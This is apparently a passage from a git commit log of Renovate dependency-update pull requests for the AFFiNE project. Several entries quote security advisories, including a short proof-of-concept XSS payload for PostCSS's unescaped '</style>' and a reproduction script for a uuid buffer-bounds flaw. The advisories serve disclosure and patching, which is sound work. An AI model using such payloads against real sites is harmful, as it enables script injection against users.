themes for gitGraph diagram - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - add new TreeView diagram ##### Patch Changes - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - add link to ishikawa diagram on mermaid.js.org - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - docs: document valid duration token formats in gantt.md - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - fix: ER diagram parsing when using "1" as entity identifier on right side The parser was incorrectly tokenizing the second "1" in patterns like `a many to 1 1:` because the lookahead rule only checked for alphabetic characters after whitespace, not digits. Added a new lookahead pattern `"1"(?=\s+[0-9])` to correctly identify the cardinality alias before a numeric entity name. Fixes [#​7472](https://redirect.github.com/mermaid-js/mermaid/issues/7472) - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - fix: scope cytoscape label style mapping to edges with labels to prevent console warnings - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - fix: support inline annotation syntax in class diagrams (class Shape <<interface>>) - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - fix: Align branch label background with text for multi-line labels in LR GitGraph layout - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - fix: preserve cause hierarchy when ishikawa effect is indented more than causes - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - refactor: remove unused createGraphWithElements function and add regression test for open edge arrowheads - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - fix: Prevent long pie chart titles from being clipped by expanding the viewBox - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - fix: prevent sequence diagram hang when "as" is used without a trailing space in participant declarations - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - fix: warn when `style` statement targets a non-existent node in flowcharts - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - fix: group state diagram SVG children under single root <g> element - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - fix: Allow :::className syntax inside composite state blocks - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) Thanks [@​aloisklink](https://redirect.github.com/aloisklink), [@​BambioGaming](https://redirect.github.com/BambioGaming)! - fix: prevent escaping `<` and `&` when `htmlLabels: false` - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - fix: treemap title and labels use theme-aware colors for dark backgrounds - Updated dependencies \[[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)]: - [@​mermaid-js/parser](https://redirect.github.com/mermaid-js/parser)@​1.1.0 </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - "" - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNTkuMiIsInVwZGF0ZWRJblZlciI6IjQzLjE1OS4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
429e7f495d |
chore: bump up link-preview-js version to v4.0.1 [SECURITY] (#14917)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [link-preview-js](https://redirect.github.com/OP-Engineering/link-preview-js) | [`4.0.0` → `4.0.1`](https://renovatebot.com/diffs/npm/link-preview-js/4.0.0/4.0.1) |  |  | --- ### link-preview-js vulnerable to IPv6 and internal loopback attacks [CVE-2026-43897](https://nvd.nist.gov/vuln/detail/CVE-2026-43897) / [GHSA-4gp8-rjrq-ch6q](https://redirect.github.com/advisories/GHSA-4gp8-rjrq-ch6q) <details> <summary>More information</summary> #### Details ##### Impact The library did not check for IPv6 loopback attacks. There was also a DNS attack, where an address could be resolved into an internal IP. This could cause internal data leaks. ##### Patches Problem has been patched in version 4.0.1. However, it cannot be completely solved by the package alone. The regex used for validation has been tightened for IPv6 addresses. The DNS resolving, however, is more difficult. The regex has been tightened to prohibit .internal, .local, .nip.io and .sslip.io addresses, however there can be other services not on the list, therefore it is imperative that users use the resolveDNSHost option to do DNS resolution before fetching content. To that regard a (scary) error message has been added when the option is not set. ##### Workarounds Users can do their own validation before fetching content. Reported by https://github.com/Andrew-most-likely #### Severity - CVSS Score: 8.7 / 10 (High) - Vector String: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N` #### References - [https://github.com/OP-Engineering/link-preview-js/security/advisories/GHSA-4gp8-rjrq-ch6q](https://redirect.github.com/OP-Engineering/link-preview-js/security/advisories/GHSA-4gp8-rjrq-ch6q) - [https://github.com/OP-Engineering/link-preview-js/pull/179](https://redirect.github.com/OP-Engineering/link-preview-js/pull/179) - [https://github.com/OP-Engineering/link-preview-js/commit/4396d48909fab37553c0e93e26447fe218363ede](https://redirect.github.com/OP-Engineering/link-preview-js/commit/4396d48909fab37553c0e93e26447fe218363ede) - [https://github.com/OP-Engineering/link-preview-js/releases/tag/4.0.1](https://redirect.github.com/OP-Engineering/link-preview-js/releases/tag/4.0.1) - [https://github.com/advisories/GHSA-4gp8-rjrq-ch6q](https://redirect.github.com/advisories/GHSA-4gp8-rjrq-ch6q) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-4gp8-rjrq-ch6q) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>OP-Engineering/link-preview-js (link-preview-js)</summary> ### [`v4.0.1`](https://redirect.github.com/OP-Engineering/link-preview-js/releases/tag/4.0.1) [Compare Source](https://redirect.github.com/OP-Engineering/link-preview-js/compare/4.0.0...4.0.1) #### What's Changed - Loopback fixes by [@​ospfranco](https://redirect.github.com/ospfranco) in [#​179](https://redirect.github.com/OP-Engineering/link-preview-js/pull/179) **Full Changelog**: <https://github.com/OP-Engineering/link-preview-js/compare/4.0.0...4.0.1> </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - "" - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNTkuMiIsInVwZGF0ZWRJblZlciI6IjQzLjE1OS4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
bf6fc66943 |
chore: bump up postcss version to v8.5.10 [SECURITY] (#14877)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [postcss](https://postcss.org/) ([source](https://redirect.github.com/postcss/postcss)) | [`8.5.6` → `8.5.10`](https://renovatebot.com/diffs/npm/postcss/8.5.6/8.5.10) |  |  | --- ### PostCSS has XSS via Unescaped </style> in its CSS Stringify Output [CVE-2026-41305](https://nvd.nist.gov/vuln/detail/CVE-2026-41305) / [GHSA-qx2v-qp2m-jg93](https://redirect.github.com/advisories/GHSA-qx2v-qp2m-jg93) <details> <summary>More information</summary> #### Details ##### PostCSS: XSS via Unescaped `</style>` in CSS Stringify Output ##### Summary PostCSS v8.5.5 (latest) does not escape `</style>` sequences when stringifying CSS ASTs. When user-submitted CSS is parsed and re-stringified for embedding in HTML `<style>` tags, `</style>` in CSS values breaks out of the style context, enabling XSS. ##### Proof of Concept ```javascript const postcss = require('postcss'); // Parse user CSS and re-stringify for page embedding const userCSS = 'body { content: "</style><script>alert(1)</script><style>"; }'; const ast = postcss.parse(userCSS); const output = ast.toResult().css; const html = `<style>${output}</style>`; console.log(html); // <style>body { content: "</style><script>alert(1)</script><style>"; }</style> // // Browser: </style> closes the style tag, <script> executes ``` **Tested output** (Node.js v22, postcss v8.5.5): ``` Input: body { content: "</style><script>alert(1)</script><style>"; } Output: body { content: "</style><script>alert(1)</script><style>"; } Contains </style>: true ``` ##### Impact Impact non-bundler use cases since bundlers for XSS on their own. Requires some PostCSS plugin to have malware code, which can inject XSS to website. ##### Suggested Fix Escape `</style` in all stringified output values: ```javascript output = output.replace(/<\/(style)/gi, '<\\/$1'); ``` ##### Credits Discovered and reported by [Sunil Kumar](https://tharvid.in) ([@​TharVid](https://redirect.github.com/TharVid)) #### Severity - CVSS Score: 6.1 / 10 (Medium) - Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` #### References - [https://github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93](https://redirect.github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93) - [https://nvd.nist.gov/vuln/detail/CVE-2026-41305](https://nvd.nist.gov/vuln/detail/CVE-2026-41305) - [https://github.com/postcss/postcss/releases/tag/8.5.10](https://redirect.github.com/postcss/postcss/releases/tag/8.5.10) - [https://github.com/advisories/GHSA-qx2v-qp2m-jg93](https://redirect.github.com/advisories/GHSA-qx2v-qp2m-jg93) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-qx2v-qp2m-jg93) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>postcss/postcss (postcss)</summary> ### [`v8.5.10`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#8510) [Compare Source](https://redirect.github.com/postcss/postcss/compare/8.5.9...8.5.10) - Fixed XSS via unescaped `</style>` in non-bundler cases (by [@​TharVid](https://redirect.github.com/TharVid)). ### [`v8.5.9`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#859) [Compare Source](https://redirect.github.com/postcss/postcss/compare/8.5.8...8.5.9) - Speed up source map encoding paring in case of the error. ### [`v8.5.8`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#858) [Compare Source](https://redirect.github.com/postcss/postcss/compare/8.5.7...8.5.8) - Fixed `Processor#version`. ### [`v8.5.7`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#857) [Compare Source](https://redirect.github.com/postcss/postcss/compare/8.5.6...8.5.7) - Improved source map annotation cleaning performance (by CodeAnt AI). </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - "" - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNDEuMyIsInVwZGF0ZWRJblZlciI6IjQzLjE0MS4zIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
df482c9cf2 |
chore: bump up uuid version to v14 [SECURITY] (#14870)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [uuid](https://redirect.github.com/uuidjs/uuid) | [`^13.0.0` → `^14.0.0`](https://renovatebot.com/diffs/npm/uuid/13.0.0/14.0.0) |  |  | --- ### uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided [GHSA-w5hq-g745-h8pq](https://redirect.github.com/advisories/GHSA-w5hq-g745-h8pq) <details> <summary>More information</summary> #### Details ##### Summary `v3`, `v5`, and `v6` accept external output buffers but do not reject out-of-range writes (small `buf` or large `offset`). By contrast, `v4`, `v1`, and `v7` explicitly throw `RangeError` on invalid bounds. This inconsistency allows **silent partial writes** into caller-provided buffers. ##### Affected code - `src/v35.ts` (`v3`/`v5` path) writes `buf[offset + i]` without bounds validation. - `src/v6.ts` writes `buf[offset + i]` without bounds validation. ##### Reproducible PoC ```bash cd /home/StrawHat/uuid npm ci npm run build node --input-type=module -e " import {v4,v5,v6} from './dist-node/index.js'; const ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8'; for (const [name,fn] of [ ['v4',()=>v4({},new Uint8Array(8),4)], ['v5',()=>v5('x',ns,new Uint8Array(8),4)], ['v6',()=>v6({},new Uint8Array(8),4)], ]) { try { fn(); console.log(name,'NO_THROW'); } catch(e){ console.log(name,'THREW',e.name); } }" ``` Observed: - `v4 THREW RangeError` - `v5 NO_THROW` - `v6 NO_THROW` Example partial overwrite evidence captured during audit: ```text same true buf [ 170, 170, 170, 170, 75, 224, 100, 63 ] v6 [ 187, 187, 187, 187, 31, 19, 185, 64 ] ``` ##### Security impact - **Primary**: integrity/robustness issue (silent partial output). - If an application assumes full UUID writes into preallocated buffers, this can produce malformed/truncated/partially stale identifiers without error. - In systems where caller-controlled offsets/buffer sizes are exposed indirectly, this may become a security-relevant logic flaw. ##### Suggested fix Add the same guard used by `v4`/`v1`/`v7`: ```ts if (offset < 0 || offset + 16 > buf.length) { throw new RangeError(`UUID byte range ${offset}:${offset + 15} is out of buffer bounds`); } ``` Apply to: - `src/v35.ts` (covers `v3` and `v5`) - `src/v6.ts` #### Severity - CVSS Score: 6.3 / 10 (Medium) - Vector String: `CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N` #### References - [https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq](https://redirect.github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq) - [https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34](https://redirect.github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34) - [https://github.com/uuidjs/uuid/releases/tag/v14.0.0](https://redirect.github.com/uuidjs/uuid/releases/tag/v14.0.0) - [https://github.com/advisories/GHSA-w5hq-g745-h8pq](https://redirect.github.com/advisories/GHSA-w5hq-g745-h8pq) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-w5hq-g745-h8pq) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>uuidjs/uuid (uuid)</summary> ### [`v14.0.0`](https://redirect.github.com/uuidjs/uuid/blob/HEAD/CHANGELOG.md#1400-2026-04-19) [Compare Source](https://redirect.github.com/uuidjs/uuid/compare/v13.0.0...v14.0.0) ##### Security - Fixes [GHSA-w5hq-g745-h8pq](https://redirect.github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq): `v3()`, `v5()`, and `v6()` did not validate that writes would remain within the bounds of a caller-supplied buffer, allowing out-of-bounds writes when an invalid `offset` was provided. A `RangeError` is now thrown if `offset < 0` or `offset + 16 > buf.length`. ##### ⚠ BREAKING CHANGES - `crypto` is now expected to be globally defined (requires node\@​20+) ([#​935](https://redirect.github.com/uuidjs/uuid/issues/935)) - drop node\@​18 support ([#​934](https://redirect.github.com/uuidjs/uuid/issues/934)) - upgrade minimum supported TypeScript version to 5.4.3, in keeping with the project's policy of supporting TypeScript versions released within the last two years </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - "" - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about these updates again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xMzkuNCIsInVwZGF0ZWRJblZlciI6IjQzLjEzOS40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
557b1e4dfc |
chore: bump up eslint-plugin-oxlint version to v1.60.0 (#14853)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [eslint-plugin-oxlint](https://redirect.github.com/oxc-project/eslint-plugin-oxlint) | [`1.58.0` → `1.60.0`](https://renovatebot.com/diffs/npm/eslint-plugin-oxlint/1.58.0/1.60.0) |  |  | --- ### Release Notes <details> <summary>oxc-project/eslint-plugin-oxlint (eslint-plugin-oxlint)</summary> ### [`v1.60.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.60.0) [Compare Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.59.0...v1.60.0) *No significant changes* ##### [View changes on GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.59.0...v1.60.0) ### [`v1.59.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.59.0) [Compare Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.58.0...v1.59.0) *No significant changes* ##### [View changes on GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.58.0...v1.59.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xMjMuOCIsInVwZGF0ZWRJblZlciI6IjQzLjEyMy44IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
cc79fa3c6d |
chore: bump up opentelemetry (#14844)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@opentelemetry/api](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/api) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`1.9.0` → `1.9.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fapi/1.9.0/1.9.1) |  |  | | [@opentelemetry/core](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-core) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.6.0` → `2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fcore/2.6.0/2.7.0) |  |  | | [@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.213.0` → `^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.213.0/0.215.0) |  |  | | [@opentelemetry/exporter-zipkin](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-exporter-zipkin) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.6.0` → `2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-zipkin/2.6.0/2.7.0) |  |  | | [@opentelemetry/instrumentation](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.213.0` → `^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation/0.213.0/0.215.0) |  |  | | [@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-graphql#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-graphql)) | [`^0.61.0` → `^0.63.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.61.0/0.63.0) |  |  | | [@opentelemetry/instrumentation-http](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation-http) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.213.0` → `^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-http/0.213.0/0.215.0) |  |  | | [@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis)) | [`^0.61.0` → `^0.63.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.61.0/0.63.0) |  |  | | [@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-nestjs-core#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-nestjs-core)) | [`^0.59.0` → `^0.61.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.59.0/0.61.0) |  |  | | [@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io)) | [`^0.60.0` → `^0.62.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.60.0/0.62.0) |  |  | | [@opentelemetry/resources](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-resources) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.6.0` → `2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fresources/2.6.0/2.7.0) |  |  | | [@opentelemetry/sdk-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/sdk-metrics) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.6.0` → `2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-metrics/2.6.0/2.7.0) |  |  | | [@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.213.0` → `^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.213.0/0.215.0) |  |  | | [@opentelemetry/sdk-trace-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-sdk-trace-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.6.0` → `2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-trace-node/2.6.0/2.7.0) |  |  | --- ### Release Notes <details> <summary>open-telemetry/opentelemetry-js (@​opentelemetry/api)</summary> ### [`v1.9.1`](https://redirect.github.com/open-telemetry/opentelemetry-js/blob/HEAD/CHANGELOG.md#191) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/v1.9.0...v1.9.1) ##### 🐛 (Bug Fix) - fix: avoid grpc types dependency [#​3551](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3551) [@​flarna](https://redirect.github.com/flarna) - fix(otlp-proto-exporter-base): Match Accept header with Content-Type in the proto exporter [#​3562](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3562) [@​scheler](https://redirect.github.com/scheler) - fix: include tracestate in export [#​3569](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3569) [@​flarna](https://redirect.github.com/flarna) ##### 🏠 (Internal) - chore: fix cross project links and missing implicitly exported types [#​3533](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3533) [@​legendecas](https://redirect.github.com/legendecas) - feat(sdk-metrics): add exponential histogram mapping functions [#​3504](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3504) [@​mwear](https://redirect.github.com/mwear) </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-graphql)</summary> ### [`v0.63.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0630-2026-04-17) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479)) ([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8)) ### [`v0.62.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0620-2026-03-25) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450)) ([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b)) </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-ioredis)</summary> ### [`v0.63.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0630-2026-04-17) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479)) ([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8)) ##### Bug Fixes - **redis-common:** expand redaction to include ACL, CONFIG, PSETEX, GETSET ([#​3472](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3472)) 